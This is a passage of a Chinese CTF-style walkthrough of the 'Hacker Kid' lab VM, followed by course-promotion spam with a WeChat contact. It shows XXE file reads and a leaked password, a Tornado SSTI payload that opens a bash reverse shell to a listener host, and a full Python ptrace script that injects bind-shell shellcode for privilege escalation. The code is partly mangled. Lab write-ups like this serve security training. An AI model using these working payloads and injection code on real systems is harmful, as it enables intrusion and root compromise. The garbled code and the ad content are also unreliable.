;; MSG SIZE rcvd: 125
将解析出的子域名,添加到/etc/hosts文件中
6.XXE漏洞
访问
hackerkid.blackhat.local,是一个注册页面,查看源码,发现是xml格式,猜测是XXE漏洞,抓包验证
漏洞利用
构造xxe,payload读取/etc/passwd文件,需要将POST的数据包中的数据部分,全部替换
成功读取
只有root用户和saket用户有/bin/bash
读取.bashrc文件
.bashrc 文件是一个在 Bash shell 启动时自动执行的脚本文件。Bash 是 Linux 和其他 UNIX-like 系统中常用的 shell,而 .bashrc 文件通常位于用户的主目录下(例如,/home/username/ 或 ~),并且通常包含用户的个性化设置和别名等。
.bashrc 文件中的命令会被自动执行。这使得用户能够定制他们的 shell 环境,包括设置环境变量、定义别名、修改提示符(prompt)等。
直接读取.bashrc会报错,所以使用php伪协议
在最后面,有账号密码,回到9999端口,登陆失败,结合密码中有Saket字样,和上面/etc/passwd中有saket用户,将账号改为saket
username=“admin”
password=“Saket!#$%@!!”
7.SSTI漏洞
根据提示,‘我怎么知道你是谁’,通过GET传参name,告诉它我是谁
因为9999端口是tornado服务,是由python搭建的框架,而tornado这个服务,有一个常见的SSTI模板输入漏洞,首先就是尝试看看有没有SSTI漏洞
payload:{{4*4}} 如果回显16,说明有漏洞
payload:{{1+abcxyz}}${1+abcxyz}<%1+abcxyz%>[abcxyz] 如果报错,说明有SSTI漏洞(这是通用的测试SSTI漏洞的payload)
既然存在漏洞,就要想办法反弹shell,获取getshell。
kali上监听8989端口:nc -lvnp 8989
编码前:
{% import os %}{{os.system('bash -c “bash -i >& /dev/tcp/192.168.0.131/8989 0>&1” ')}}
编码后:
%7B%25%20import%20os%20%25%7D%7B%7Bos%2Esystem%28%27bash%20%2Dc%20%22bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E0%2E131%2F8989%200%3E%261%22%20%27%29%7D%7D
8.提权
当python具备cap_sys_ptrace+ep 能力时,可以用来进行提权
1.查看python是否具备这个能力
/usr/sbin/getcap: 这是 getcap 命令的完整路径
-r:是递归出子目录
2>/dev/null: 这是对命令的标准错误输出的处理。
saket@ubuntu:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
/snap/core22/1033/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_sys_ptrace+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
2.使用python执行exp.py脚本,如果提权成功,靶机则会开放5600端口
在kali中写一个1.py;通过python3 -m http.server 8888,上传到靶机中
inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
import ctypes
import sys
import struct
Macros defined in <sys/ptrace.h>
https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
Structure defined in <sys/user.h>
https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
fields = [
(“r15”, ctypes.c_ulonglong),
(“r14”, ctypes.c_ulonglong),
(“r13”, ctypes.c_ulonglong),
(“r12”, ctypes.c_ulonglong),
(“rbp”, ctypes.c_ulonglong),
(“rbx”, ctypes.c_ulonglong),
(“r11”, ctypes.c_ulonglong),
(“r10”, ctypes.c_ulonglong),
(“r9”, ctypes.c_ulonglong),
(“r8”, ctypes.c_ulonglong),
(“rax”, ctypes.c_ulonglong),
(“rcx”, ctypes.c_ulonglong),
(“rdx”, ctypes.c_ulonglong),
(“rsi”, ctypes.c_ulonglong),
(“rdi”, ctypes.c_ulonglong),
(“orig_rax”, ctypes.c_ulonglong),
(“rip”, ctypes.c_ulonglong),
(“cs”, ctypes.c_ulonglong),
(“eflags”, ctypes.c_ulonglong),
(“rsp”, ctypes.c_ulonglong),
(“ss”, ctypes.c_ulonglong),
(“fs_base”, ctypes.c_ulonglong),
(“gs_base”, ctypes.c_ulonglong),
(“ds”, ctypes.c_ulonglong),
(“es”, ctypes.c_ulonglong),
(“fs”, ctypes.c_ulonglong),
(“gs”, ctypes.c_ulonglong),
]
libc = ctypes.CDLL(“libc.so.6”)
pid=int(sys.argv[1])
Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))
Shell code copied from exploit db.
shellcode=“\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05”
Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
Convert the byte to little endian.
shellcode_byte_int=int(shellcode[i:4+i].encode(‘hex’),16)
shellcode_byte_little_endian=struct.pack(“<I”, shellcode_byte_int).rstrip(‘\x00’).encode(‘hex’)
shellcode_byte=int(shellcode_byte_little_endian,16)
Inject the byte.
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
print(“Shellcode Injected!!”)
Modify the instuction pointer
registers.rip=registers.rip+2
Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))
Detach from the process.
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)
一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!
AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算
2182
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
